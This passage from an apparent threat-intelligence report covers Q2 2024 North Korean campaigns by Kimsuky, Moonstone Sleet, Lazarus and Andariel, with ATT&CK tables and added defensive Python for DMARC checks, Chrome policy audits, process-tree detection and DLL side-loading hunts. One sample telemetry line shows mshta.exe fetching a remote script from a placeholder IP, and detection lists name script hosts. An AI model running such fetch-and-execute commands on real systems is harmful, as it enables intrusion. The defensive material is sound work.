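The DMARC weakness referred to above is concrete and checkable: a domain whose `_dmarc` TXT record is missing or publishes `p=none` tells receiving mail servers to deliver spoofed messages and merely report them, which is what lets an actor send mail "from" a think tank or university. The following added example (not from the original report) parses a DMARC record and lists the gaps a spoofer can use; it works on record text, so fetching the TXT record (for instance with `dig TXT _dmarc.example.com`) is left to the caller. The records and domain names are constructed.

```python
from typing import Dict, List, Optional


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split a DMARC TXT record ('v=DMARC1; p=none; rua=...') into lower-cased tags."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: Optional[str]) -> List[str]:
    """Return the weaknesses a spoofer can exploit; an empty list means the domain
    publishes a fully enforcing policy with reporting."""
    if record is None:
        return ["no DMARC record published: receivers apply no policy at all"]
    tags = parse_dmarc(record)
    issues: List[str] = []
    if tags.get("v") != "DMARC1":
        issues.append("record does not begin with v=DMARC1: receivers will ignore it")
    policy = tags.get("p", "").lower()
    if not policy:
        issues.append("missing p= tag: record is invalid")
    elif policy == "none":
        issues.append("p=none: spoofed mail is delivered and merely reported")
    elif policy not in ("quarantine", "reject"):
        issues.append(f"p={policy}: unknown policy value")
    # sp= defaults to p=; an explicit sp=none undoes an otherwise strict policy.
    sub_policy = tags.get("sp", policy).lower()
    if sub_policy == "none" and policy not in ("", "none"):
        issues.append("sp=none: subdomains can still be spoofed")
    pct = tags.get("pct", "100")
    if not pct.isdigit():
        issues.append(f"pct={pct}: not a number")
    elif int(pct) < 100:
        issues.append(f"pct={pct}: policy enforced on only part of the mail stream")
    if "rua" not in tags:
        issues.append("no rua= address: nobody receives aggregate reports of spoofing")
    return issues


# Constructed records for fictitious domains.
SAMPLE_RECORDS = {
    "thinktank.example": "v=DMARC1; p=none; rua=mailto:dmarc@thinktank.example",
    "partial.example": "v=DMARC1; p=reject; pct=10",
    "hardened.example": "v=DMARC1; p=reject; sp=reject; pct=100; rua=mailto:dmarc@hardened.example",
}


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        print(domain, assess_dmarc(record) or ["enforcing"])
```

Note that DMARC only protects a domain against spoofing of its exact name; it does nothing against look-alike domains registered by the attacker, so the check is necessary but not sufficient.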
Kimsuky has also run a cyber espionage campaign that uses Facebook as the initial point of contact, with operators posing as human rights officials to target people working on North Korea issues. Using fake profiles, they engage targets over Facebook Messenger and build trust over time before sharing OneDrive links to what appear to be legitimate documents, such as ‘My_Essay(prof).msc’. This Microsoft Common Console Document file, when opened, executes a concealed payload known as ReconShark. The variant runs stealthily and connects to a command-and-control (C2) server, and it maintains long-term access through a dropped script (‘warm.vbs’) and a scheduled task named ‘OneDriveUpdate’, through which it exfiltrates sensitive information. The campaign’s reach and its reliance on patient social engineering show how the group’s tradecraft continues to evolve.
MITRE ATT&CK Techniques

| Tactic | ID | Technique / Sub-technique |
|---|---|---|
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Privilege Escalation | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Discovery | T1046 | Network Service Discovery |
| Discovery | T1082 | System Information Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Command and Control | T1095 | Non-Application Layer Protocol |
Meanwhile, in Q2 2024, researchers discovered new Kimsuky activity involving a malicious Google Chrome extension named "TRANSLATEXT" used for cyber espionage. The extension, uploaded to an attacker-controlled GitHub repository in March, was designed to steal email addresses, usernames, passwords and cookies, and to capture screenshots of the browser. TRANSLATEXT bypasses the security measures of prominent email providers such as Gmail, Kakao and Naver. The attack primarily targeted South Korean academics involved in political research related to North Korea. Kimsuky's tactics included PowerShell scripts and Windows registry modifications that force the extension's installation through browser policy. The ongoing campaign emphasizes the need for vigilance against such threats, and in particular for monitoring browser extension policies that appear outside normal change control.
MITRE ATT&CK Techniques

| Tactic | ID | Technique / Sub-technique |
|---|---|---|
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Persistence | T1176 | Browser Extensions |
| Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers |
| Collection | T1113 | Screen Capture |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols |
| Command and Control | T1102.001 | Web Service: Dead Drop Resolver |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
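Chrome honours forced extension installs through the ExtensionInstallForcelist policy, which on Windows is read from the registry, so a registry change that enforces an extension install leaves a policy entry that can be audited. The block below is an added example, not part of the original research: a hypothetical Python helper that parses a `.reg` export of the Chrome policy keys and classifies every forced extension by whether its update URL is the Chrome Web Store or somewhere else. It also reports when DevTools have been disabled by policy, since that setting keeps a curious user from inspecting what a forced extension does. The extension IDs, the off-store URL and the export contents are constructed.

```python
"""Audit Chrome's ExtensionInstallForcelist and DeveloperToolsAvailability policies from a
.reg export. Added example with constructed sample data; not from the TRANSLATEXT research."""
import re
from dataclasses import dataclass

CHROME_POLICY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome"
FORCELIST_KEY = CHROME_POLICY_KEY + r"\ExtensionInstallForcelist"
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"
EXT_ID = re.compile(r"^[a-p]{32}$")  # Chrome extension IDs: 32 characters drawn from a-p


@dataclass
class ForcedExtension:
    value_name: str
    ext_id: str
    update_url: str
    verdict: str  # "webstore", "off-store", "allowlisted" or "malformed"


def parse_reg_export(text):
    """Yield (key, value_name, data) from a Windows .reg export.
    Handles REG_SZ ("..." with doubled backslashes unescaped) and REG_DWORD (dword:hex)."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'"([^"]+)"=(.+)$', line) if key else None
        if not m:
            continue
        name, data = m.group(1), m.group(2)
        if data.startswith("dword:"):
            yield key, name, int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            yield key, name, data[1:-1].replace("\\\\", "\\")


def audit_forcelist(reg_text, allowlist=frozenset()):
    """Forcelist entries have the form '<extension id>;<update url>'. An absent update URL
    means the Web Store, so only an explicit non-store URL counts as off-store."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if key.lower() != FORCELIST_KEY.lower() or not isinstance(data, str):
            continue
        ext_id, _, url = data.partition(";")
        if not EXT_ID.match(ext_id):
            verdict = "malformed"
        elif ext_id in allowlist:
            verdict = "allowlisted"
        elif url in ("", WEBSTORE_UPDATE_URL):
            verdict = "webstore"
        else:
            verdict = "off-store"
        findings.append(ForcedExtension(name, ext_id, url, verdict))
    return findings


def devtools_disabled(reg_text):
    """True when DeveloperToolsAvailability is 2, Chrome's value for 'DevTools disallowed'."""
    for key, name, data in parse_reg_export(reg_text):
        if key.lower() == CHROME_POLICY_KEY.lower() and name == "DeveloperToolsAvailability":
            return data == 2
    return False


# Constructed sample export: one Web Store extension, one forced from an off-store URL,
# one malformed entry, plus DevTools disabled. IDs and URL are placeholders, not real IOCs.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome]
"DeveloperToolsAvailability"=dword:00000002

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist]
"1"="aaaaaaaabbbbbbbbccccccccdddddddd;https://clients2.google.com/service/update2/crx"
"2"="abcdefghijklmnopabcdefghijklmnop;https://203.0.113.7/update.xml"
"3"="not-an-extension-id"
"""

if __name__ == "__main__":
    for f in audit_forcelist(SAMPLE_REG):
        print(f"value {f.value_name}: {f.ext_id} -> {f.verdict} ({f.update_url or 'web store'})")
    print("DevTools disabled by policy:", devtools_disabled(SAMPLE_REG))
```

To produce the input on a host, run `reg export "HKLM\SOFTWARE\Policies\Google\Chrome" chrome_policy.reg` and read the file with `encoding="utf-16"`, which is the encoding `reg export` writes by default; repeat for the HKEY_CURRENT_USER policy hive, since per-user policy keys work the same way. Any "off-store" or "malformed" verdict on a machine that is not under enterprise browser management is worth treating as a finding, and a DevTools-disabled policy on an unmanaged machine is a strong hint that someone wanted the extension left alone.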
In Q2 2024, researchers also found Kimsuky exploiting the Microsoft Office Equation Editor vulnerability (CVE-2017-11882) to distribute a keylogger. The exploit ran an embedded script through mshta.exe, which fetched a further script from a URL disguised as an error page. That script downloaded the keylogger, which stores captured keystrokes and clipboard contents in a file named desktop.ini.bak and attempts to register itself under a Windows registry Run key so that it starts at logon. A coding error meant the registry entry was never created, but the keylogger still collected data and sent it to the command-and-control server, after which the log file was deleted and recreated for the next collection cycle.
MITRE ATT&CK Techniques

| Tactic | ID | Technique / Sub-technique |
|---|---|---|
| Execution | T1203 | Exploitation for Client Execution |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Credential Access | T1056 | Input Capture |
| Collection | T1005 | Data from Local System |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
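The delivery chain above has a distinctive process tree: the Equation Editor (EQNEDT32.EXE) is started out-of-process by DCOM, so its parent is svchost.exe rather than the Office application, and after exploitation the shellcode's first action is to spawn a child such as mshta.exe. The block below is an added example, not part of the original research: hypothetical Python detection rules run over constructed Sysmon-style process-creation records, flagging any child of EQNEDT32.EXE, any script host spawned directly by an Office application, and any mshta.exe launched with a remote URL. The event records, paths and URL are constructed.

```python
"""Process-tree detection for the CVE-2017-11882 -> mshta.exe delivery chain.
Added example over constructed telemetry; rules and names are assumptions, not ASEC's."""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def image_name(path):
    """Lower-case file name of an image path, whichever separator the log source used."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    alerts = []
    for ev in events:
        child, parent = image_name(ev.image), image_name(ev.parent_image)
        # Rule 1: the Equation Editor has no legitimate reason to spawn a child. After
        # CVE-2017-11882 the shellcode runs inside EQNEDT32.EXE, so its child is the
        # first attacker-controlled process.
        if parent == EQUATION_EDITOR:
            alerts.append(Alert("equation-editor-child", ev.pid, f"{parent} spawned {child}"))
        # Rule 2: an Office application spawning a script host (macros and other exploit paths).
        elif parent in OFFICE_IMAGES and child in SCRIPT_HOSTS:
            alerts.append(Alert("office-script-host", ev.pid, f"{parent} spawned {child}"))
        # Rule 3: mshta.exe handed a remote URL, the download step of this chain.
        if child == "mshta.exe":
            m = REMOTE_URL.search(ev.command_line)
            if m:
                alerts.append(Alert("mshta-remote-url", ev.pid, m.group(0)))
    return alerts


# Constructed sample telemetry, not real logs. EQNEDT32.EXE is launched by DCOM with
# "-Embedding" and a svchost.exe parent, so a rule that only watches Office parents
# would miss the mshta.exe launch.
EQNEDT32 = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
SAMPLE_EVENTS = [
    ProcEvent(4100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4212, EQNEDT32, f'"{EQNEDT32}" -Embedding', r"C:\Windows\System32\svchost.exe"),
    ProcEvent(4300, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://203.0.113.7/error.html", EQNEDT32),
    ProcEvent(4500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid {a.pid}: {a.detail}")
```

The same records can be taken from Sysmon Event ID 1 or Windows Security Event ID 4688 (with command-line auditing enabled). Rule 1 is the high-confidence one; Rule 2 is noisier in environments that still run macros, and Rule 3 on its own also fires on legitimate HTA applications hosted internally, so pair it with an allowlist of internal hosts rather than tuning it away. A file-creation rule for desktop.ini.bak under user profiles is a cheap complement for this particular sample but, unlike the process tree, is trivial for the next variant to change.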
MOONSTONE SLEET
At the beginning of Q2 2024, researchers identified a new North Korean threat actor, Moonstone Sleet (also tracked as Storm-1789), which employs both established and unique attack methodologies for financial and cyberespionage objectives. This group sets up fake companies and job opportunities to engage targets, uses trojanized legitimate tools, creates a malicious game, and deploys custom ransomware. Moonstone Sleet, initially overlapping with Diamond Sleet, now operates with its own infrastructure and attack methods. Notable tactics include delivering trojanized PuTTY via social media and freelancing platforms, using malicious npm packages, and creating fake companies like StarGlow Ventures and C.C. Waterfall. The group has developed a malicious tank game, DeTankWar, and a ransomware variant, FakePenny, to target companies. Moonstone Sleet’s operations indicate a well-resourced actor with capabilities inherited from prior North Korean cyber operations, suggesting a strategic alignment with North Korean cyber objectives.
MITRE ATT&CK Techniques

| Tactic | ID | Technique / Sub-technique |
|---|---|---|
| Execution | T1129 | Shared Modules |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Privilege Escalation | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Command and Control | T1071 | Application Layer Protocol |
| Impact | T1486 | Data Encrypted for Impact |
LAZARUS
By the beginning of Q2 2024, researchers had found that the North Korea-linked Lazarus Group used fake job lures to deliver the new Kaolin RAT in attacks on individuals in Asia during the summer of 2023. Kaolin RAT can change file timestamps and load DLL binaries from its command-and-control (C2) servers, and it also serves as the conduit for the FudModule rootkit. That rootkit exploits a since-patched vulnerability in the appid.sys driver (CVE-2024-21338, CVSS 7.8) to disable security mechanisms. Lazarus's Operation Dream Job campaign uses social media and instant messaging platforms to trick targets into launching malicious ISO files containing a renamed legitimate Windows application, "AmazonVNC.exe", that side-loads "version.dll", which in turn injects a payload read from "aws.cfg". This payload downloads shellcode from a compromised Italian company website and launches RollFling, then RollSling, which loads RollMid. RollMid establishes C2 communication through a three-step process involving HTML files, PNG images carrying steganographically hidden data and Base64-encoded data blobs, and ultimately fetches Kaolin RAT. The RAT enumerates files, performs file operations, uploads files to the C2 server, alters timestamps, manages processes, executes commands and connects to hosts. This complex and evolving attack chain demonstrates significant resource investment and innovation, and poses a substantial challenge to defenders.
MITRE ATT&CK Techniques

| Tactic | ID | Technique / Sub-technique |
|---|---|---|
| Initial Access | T1566 | Phishing |
| Execution | T1059 | Command and Scripting Interpreter |
| Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Defense Evasion | T1036 | Masquerading |
| Defense Evasion | T1497 | Virtualization/Sandbox Evasion |
| Discovery | T1082 | System Information Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Application Layer Protocol |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
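The first stage of the chain above is a classic DLL side-loading layout: a renamed legitimate executable ("AmazonVNC.exe") sits in a user-reachable location (here a mounted ISO) next to a DLL that carries the name of a Windows system DLL ("version.dll"), and the loader resolves the application directory before System32 for any DLL that is not on the KnownDLLs list. The block below is an added example, not part of the original research: a hypothetical Python hunt over a constructed file inventory that groups files by directory and reports every executable outside the administrator-installed locations that has a system-named DLL beside it. The system DLL list, trusted directories and inventory are assumptions for the example.

```python
"""Hunt for executable + system-named DLL pairs outside trusted install locations.
Added example over a constructed inventory; not Avast's code and not a Lazarus IOC list."""
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath

# DLL names that belong under System32/SysWOW64 and are frequent side-loading targets.
# Assumption for this example; build the real list from a clean reference host.
SYSTEM_DLLS = {"version.dll", "dbghelp.dll", "wininet.dll", "cryptbase.dll",
               "msimg32.dll", "userenv.dll", "dwmapi.dll", "uxtheme.dll",
               "profapi.dll", "propsys.dll", "secur32.dll", "wtsapi32.dll"}
# Executables here were installed by administrators; user profiles, temp folders,
# removable drives and mounted ISOs are where a dropped pair turns up.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


@dataclass
class SideLoadCandidate:
    directory: str
    executable: str
    dlls: list


def hunt_sideload_pairs(paths, system_dlls=SYSTEM_DLLS):
    """Group an inventory of Windows paths by directory, then report each executable
    outside TRUSTED_DIRS that shares its directory with a DLL shadowing a system DLL."""
    by_dir = defaultdict(lambda: {"exe": [], "dll": []})
    for p in paths:
        wp = PureWindowsPath(p)
        # Normalise to a lower-case directory with one trailing backslash ("e:\" for a drive root).
        directory = str(wp.parent).lower().rstrip("\\") + "\\"
        lower = wp.name.lower()
        if lower.endswith(".exe"):
            by_dir[directory]["exe"].append(wp.name)
        elif lower.endswith(".dll"):
            by_dir[directory]["dll"].append(wp.name)
    hits = []
    for directory, files in sorted(by_dir.items()):
        if directory.startswith(TRUSTED_DIRS):
            continue
        shadowing = sorted(d for d in files["dll"] if d.lower() in system_dlls)
        if not shadowing:
            continue
        for exe in sorted(files["exe"]):
            hits.append(SideLoadCandidate(directory, exe, shadowing))
    return hits


# Constructed inventory: the real copy of version.dll, an installed application, a temp
# directory with a DLL that shadows nothing, and a mounted ISO (drive E:) holding the
# renamed executable, the side-loaded DLL and the configuration blob from the chain above.
SAMPLE_INVENTORY = [
    r"C:\Windows\System32\version.dll",
    r"C:\Program Files\Notepad++\notepad++.exe",
    r"C:\Users\alice\AppData\Local\Temp\tool.exe",
    r"C:\Users\alice\AppData\Local\Temp\helper.dll",
    r"E:\AmazonVNC.exe",
    r"E:\version.dll",
    r"E:\aws.cfg",
]

if __name__ == "__main__":
    for hit in hunt_sideload_pairs(SAMPLE_INVENTORY):
        print(f"{hit.directory}{hit.executable} sits next to {', '.join(hit.dlls)}")
```

Feed it a directory listing from the host or the file paths in EDR file-creation events; on a real hunt, follow each hit by checking the DLL's Authenticode signature and comparing its hash with the System32 copy, because a legitimately bundled version.dll does occur. Treating mounted ISO drive letters as untrusted is the point of the example: the ISO lure puts the pair on a drive the user never installed anything to.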
ANDARIEL
Researchers identified new Andariel APT campaigns targeting Korean corporations in Q2 2024. The attacks employed a variety of malware, including keyloggers, infostealers and proxy tools alongside backdoors, to gain control of compromised systems and exfiltrate data. Nestdoor, a persistent RAT, featured prominently: in some cases it was delivered by exploiting the Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon, it disguised itself as legitimate software such as OpenVPN, and it maintained persistence through scheduled tasks while communicating with its command-and-control (C&C) server. Andariel has also introduced a new Go-based malware strain, Dora RAT, which supports basic functionality such as a reverse shell and file operations and has in some samples been signed with a valid code-signing certificate to evade detection. In addition to direct attacks, the group has used proxy tools similar to those previously linked to Lazarus Group activity, underscoring its continued adaptation of tactics over time.
CONCLUSION
In Q2 2024, the APT landscape showcased intensified efforts by Iranian, Russian, Chinese, and North Korean cyber actors. These groups have demonstrated advanced capabilities and strategic intent across various regions and sectors, emphasizing the critical need for heightened cybersecurity measures. To mitigate these evolving threats, it is imperative for organizations to prioritize continuous monitoring, robust defense mechanisms, and comprehensive user education, ensuring proactive and adaptive responses to protect against the diverse and dynamic landscape of cyber espionage and cybercrime.